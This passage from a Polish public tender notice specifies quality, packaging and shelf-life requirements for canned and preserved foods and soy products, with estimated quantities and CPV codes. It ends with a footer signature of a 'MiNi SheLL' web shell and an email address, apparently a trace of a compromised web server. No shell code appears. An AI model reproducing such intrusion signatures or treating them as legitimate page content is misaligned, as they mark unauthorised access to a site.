- smak i zapach - słonawo-słodki, charakterystyczny dla kukurydzy konserwowej, bez posmaków i zapachów obcych,
Cechy dyskwalifikujące:
- obce posmaki, zapachy, smak stęchły, mdły, niedopuszczalny smak obcy świadczący o nieświeżości,
- niedopuszczalne zawilgocenia,
- objawy psucia, pleśnienia,
- uszkodzenia mechaniczne opakowań, brak oznakowania, nieszczelność,
- obecność szkodników żywych, martwych oraz ich pozostałości,
Opakowanie:
- opakowanie jednostkowe puszki metalowe o wadze do 3 kg,
Inne wymagania: Termin przydatności do spożycia min. 3 miesiące od daty dostawy
Produkt musi odpowiadać PN.

4)  CHRZAN TARTY:
     Chrzan tarty może być z kwaskiem cytrynowym.
     Wymagania klasyfikacyjne:
- produkt spożywczy otrzymany ze świeżych, pozbawionych skórki tartych korzeni chrzanu, możliwie kwasku cytrynowego z dodatkiem soli i cukru,
- struktura - przetarta masa z zawartością drobnych fragmentów korzeni chrzanu,
- smak i zapach - charakterystyczny dla chrzanu, lekko piekący, kwaśnosłodki,
- zawartość soli kuchennej nie więcej niż - 2,0%,
- barwa biała lub biało kremowa,
Dopuszczalne tolerancje: dopuszcza się rozwarstwienie przetartego chrzanu oraz barwę o odcieniu szarawym.
Cechy dyskwalifikujące:
- obce posmaki, zapachy, smak mocno słony, stęchły,
- objawy zapleśnienia, psucia,
- obecność drobnoustrojów chorobotwórczych,
- obecność zanieczyszczeń mechanicznych,
- brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia.
Opakowanie:
- opakowanie jednostkowe - słoiki szklane do 1 kg,
Inne wymagania: Termin przydatności do spożycia min. 3 miesiące od daty dostawy.
 Produkt musi odpowiadać PN.

5)  PRZECIER JABŁKOWY:
Produkt spożywczy wysoko słodzony wyprodukowany z naturalnych jabłek, pasteryzowany.
Wymagania klasyfikacyjne:
- smak: słodki lub słodko - kwaśny charakterystyczny dla owoców - jabłek, posmak skarmelizowanych jabłek,
  - zapach: charakterystyczny dla musu jabłkowego,
  - konsystencja: gęsta, płynna,
  - barwa: beżowa lub złocista,
Cechy dyskwalifikujące:
  - obce zapachy, smak stęchły, gorzki, niedopuszczalny smak obcy świadczący o nieświeżości,
  - niedopuszczalne zawilgocenia, zmiana zabarwienia,
  - objawy psucia, pleśnienia,
  - uszkodzenia mechaniczne opakowań, brak oznakowania, nieszczelność,
Opakowanie:
  - opakowanie jednostkowe - słoiki o pojemności do 1 litra/kg,
  Inne wymagania: Termin przydatności do spożycia min. 3 miesiące od daty dostawy.
Produkt musi odpowiadać PN.

6)SOJOWY GRANULAT:
Produkt z wysokiej jakości odtłuszczonej mąki sojowej, w 100% roślinny, naturalny - w procesie produkcji jedynym dodatkiem jest woda. Swój ostateczny kształt uzyskuje w wyniku zastosowania w produkcji procesu ekstruzji pod wysokim ciśnieniem.
Wymagania klasyfikacyjne:
- konsystencja: twarda, chrupka,
- wygląd - kostka,
- barwa - charakterystyczna dla mąki sojowej.
Cechy dyskwalifikujące:
- obce posmaki, zapachy itp.,
- zanieczyszczenia mechaniczne,
- zawilgocenie, zwietrzenie, zmiana zabarwienia,
- uszkodzenia mechaniczne opakowań, brak oznakowania, nieszczelność,
- obecność zanieczyszczeń chemicznych, szkodników i bakterii chorobotwórczych.
Opakowanie:
- opakowanie jednostkowe - worki o masie do 10 kg, 
Inne wymagania: Termin przydatności do spożycia min. 6 miesięcy od daty dostawy.
Produkt musi odpowiadać PN.

7)  SOJOWA KOSTKA:  
Produkt z wysokiej jakości odtłuszczonej mąki sojowej, w 100% roślinny, naturalny, w procesie produkcji jedynym
dodatkiem jest woda. Swój ostateczny kształt uzyskuje w wyniku zastosowania w produkcji procesu ekstruzji pod  wysokim ciśnieniem.
 Wymagania klasyfikacyjne:
- konsystencja: twarda, chrupka,
- wygląd - kostka ,
- barwa - charakterystyczna dla mąki sojowej.
Cechy dyskwalifikujące:
- obce posmaki, zapachy itp.,
- zanieczyszczenia mechaniczne,
- zawilgocenie, zwietrzenie, zmiana zabarwienia,
- uszkodzenia mechaniczne opakowań, brak oznakowania, nieszczelność,
- obecność zanieczyszczeń chemicznych, szkodników i bakterii chorobotwórczych.
Opakowanie:
- opakowanie jednostkowe -  worki o masie do 10 kg, 
Inne wymagania: Termin przydatności do spożycia min. 6 miesięcy od daty dostawy.
Produkt musi odpowiadać PN.

8)  SOJOWA KRAJANKA:  
Produkt z wysokiej jakości odtłuszczonej mąki sojowej, w 100% roślinny, naturalny, w procesie produkcji jedynym dodatkiem jest woda. Swój ostateczny kształt uzyskuje w wyniku zastosowania w produkcji procesu ekstruzji pod wysokim ciśnieniem.
     
Wymagania klasyfikacyjne:
- konsystencja: twarda, chrupka,
- wygląd - krojone kawałki,
- barwa - charakterystyczna dla mąki sojowej.
Cechy dyskwalifikujące:
- obce posmaki, zapachy itp.,
- zanieczyszczenia mechaniczne,
- zawilgocenie, zwietrzenie, zmiana zabarwienia,
- uszkodzenia mechaniczne opakowań, brak oznakowania, nieszczelność,
- obecność zanieczyszczeń chemicznych, szkodników i bakterii chorobotwórczych.
Opakowanie:
- opakowanie jednostkowe -  worki o masie do 10 kg, 
Inne wymagania: Termin przydatności do spożycia min. 6 miesięcy od daty dostawy.
Produkt musi odpowiadać PN.

9)KOTLETY SOJOWE: 
Produkt z wysokiej jakości odtłuszczonej mąki sojowej, w 100% roślinny, naturalny, w procesie produkcji jedynym dodatkiem jest woda. Swój ostateczny kształt uzyskuje w wyniku zastosowania w produkcji procesu ekstruzji pod wysokim ciśnieniem.
Wymagania klasyfikacyjne:
- konsystencja: twarda, chrupka,
- wygląd - kotlety w kształcie zbliżonym do kwadratu,
- barwa - charakterystyczna dla mąki sojowej.
Cechy dyskwalifikujące:
 - obce posmaki, zapachy itp.,
- zanieczyszczenia mechaniczne,
- zawilgocenie, zwietrzenie, zmiana zabarwienia,
- uszkodzenia mechaniczne opakowań, brak oznakowania, nieszczelność,
- obecność zanieczyszczeń chemicznych, szkodników i bakterii chorobotwórczych.
Opakowanie:
- opakowanie jednostkowe -  worki lub inne o masie do 10 kg, 
Inne wymagania: Termin przydatności do spożycia min. 6 miesięcy od daty dostawy.
 Produkt musi odpowiadać PN.

10)  DŻEM TRUSKAWKOWY:  
Dżem otrzymany z owoców - truskawek, produkt o odpowiedniej zżelowanej konsystencji, wynik gotowania owoców świeżych, mrożonych, pasteryzowanych lub pulpy, z dodatkiem cukru oraz innych substancji dopuszczonych przez ustawodawstwo krajowe.
Wymagania klasyfikacyjne:
  - konsystencja - zżelowana, smarowna masa,
  - wygląd - całe owoce lub ich fragmenty w zżelowanej, szklistej masie,
  - barwa - charakterystyczna dla użytych składników, możliwie wyrównana dla owoców i galaretki,
  - smak i zapach - charakterystyczny dla owoców - truskawek.
Cechy dyskwalifikujące:
- obce posmaki, zapachy, smak gorzki, mocno kwaśny, stęchły, mdły itp.,
  - zanieczyszczenia mechaniczne,
  - objawy psucia, fermentowania, pleśnienia, zmiana zabarwienia,
  - uszkodzenia mechaniczne opakowań, brak oznakowania, nieszczelność,
Opakowanie:
  - opakowanie jednostkowe - słoiki lub wiaderka o pojemności do 15 kg
  Inne wymagania: Termin przydatności do spożycia min. 3 miesiące od daty dostawy.
 Produkt musi odpowiadać PN.

11)  POWIDŁA ŚLIWKOWE:
Powidła otrzymane z owoców - śliwek, produkt o odpowiedniej zżelowanej konsystencji, wynik gotowania owoców
świeżych, mrożonych, pasteryzowanych lub pulpy z dodatkiem cukru, oraz innych substancji dopuszczonych przez
ustawodawstwo krajowe.
Wymagania klasyfikacyjne:
  - konsystencja - zżelowana, smarowna masa,
  - wygląd - całe owoce lub ich fragmenty w zżelowanej, szklistej masie,
  - barwa - charakterystyczna dla użytych składników, możliwie wyrównana dla owoców i galaretki,
  - smak i zapach - charakterystyczny dla owoców - śliwek.
Cechy dyskwalifikujące:
  - obce posmaki, zapachy, smak gorzki, mocno kwaśny, stęchły, mdły itp.,
  - zanieczyszczenia mechaniczne,
  - objawy psucia, zafermentowania, pleśnienia, zmiana zabarwienia,
  - uszkodzenia mechaniczne opakowań, brak oznakowania, nieszczelność,
  - obecność szkodników żywych, martwych oraz ich pozostałości,
Opakowanie:
  - opakowanie jednostkowe - słoiki lub wiaderka o pojemności do 15 kg,
  Inne wymagania: Termin przydatności do spożycia min. 3 miesiące od daty dostawy.
 Produkt musi odpowiadać PN.

12)  SYROP OWOCOWY:
Produkt spożywczy wysoko słodzony wyprodukowany z naturalnego zagęszczonego soku, bez konserwantów.
Wymagania klasyfikacyjne:
- smak słodki: charakterystyczny dla syropu owocowego,
  - zapach: charakterystyczny dla syropu owocowego,
  - konsystencja: gęsta, płynna,
  - dopuszcza się pasteryzację jako proces konserwujący produkt,
Cechy dyskwalifikujące:
  - obce zapachy, smak stęchły, gorzki, kwaśny, niedopuszczalny smak obcy, świadczący o nieświeżości,
  - niedopuszczalne zawilgocenia, silne zmętnienie, zmiana zabarwienia,
  - objawy psucia, pleśnienia,
  - uszkodzenia mechaniczne opakowań, brak oznakowania, nieszczelność,
Opakowanie:
  - opakowanie jednostkowe- butelka lub butla o pojemności do 5 litrów,
  Inne wymagania: Termin przydatności do spożycia min. 3 miesiące od daty dostawy.
 Produkt musi odpowiadać PN.

13)MARMOLADA: 
Marmolada jest mieszaniną o odpowiednio zżelowanej konsystencji: cukrów, pulpy, przecieru świeżego lub  konserwowanego, soku lub ekstraktu wodnego, otrzymanych z wielu gatunków owoców, z ewentualnym dodatkiem kwasów spożywczych lub syropu skrobiowego.
Wymagania klasyfikacyjne:
- barwa - charakterystyczna dla użytych składników,
  - smak i zapach - charakterystyczny dla owoców,
  - konsystencja - twarda, smarowna masa,
  - wygląd - całe owoce lub ich fragmenty w zżelowanej, szklistej masie.
Cechy dyskwalifikujące:
 - obce posmaki, zapachy, smak gorzki, mocno kwaśny, stęchły, mdły itp.,
 - zanieczyszczenia mechaniczne,
- objawy psucia, fermentowania, pleśnienia, zmiana zabarwienia,
  - uszkodzenia mechaniczne opakowań, brak oznakowania, nieszczelność,
  - obecność zanieczyszczeń chemicznych, szkodników i bakterii chorobotwórczych.
Opakowanie:
  - opakowanie jednostkowe - słoiki lub wiaderka o pojemności do 15 kg.
  Inne wymagania: Termin przydatności do spożycia min. 3 miesiące od daty dostawy.
 Produkt musi odpowiadać PN.

Szacunkowe ilości przedmiotu zamówienia:

Koncentrat pomidorowy		 - 	 4 800  kg
Groszek konserwowy 		 -	 2 300  kg 
Kukurydza konserwowa		 - 	 2 200  kg
Chrzan tarty 		 	 -	 1 100  kg 
Przecier jabłkowy		 	 - 	    650  kg
Sojowy granulat 		 	 -	    650  kg 
Sojowa kostka		 	 - 	 1 100  kg
Sojowa krajanka		 	 -	    300  kg 
Kotlety sojowe		 	 - 	    600  kg
Dżem truskawkowy 		 -	 3 800  kg 
Powidła śliwkowe		 	 - 	 2 100  kg
Syrop owocowy		 	 -	 2 200  kg 
Marmolada		 	 -	 2 800  kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.14.00-1, 15.32.10.00-4, 15.33.14.25-2, 15.33.22.30-5, 15.33.22.90-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com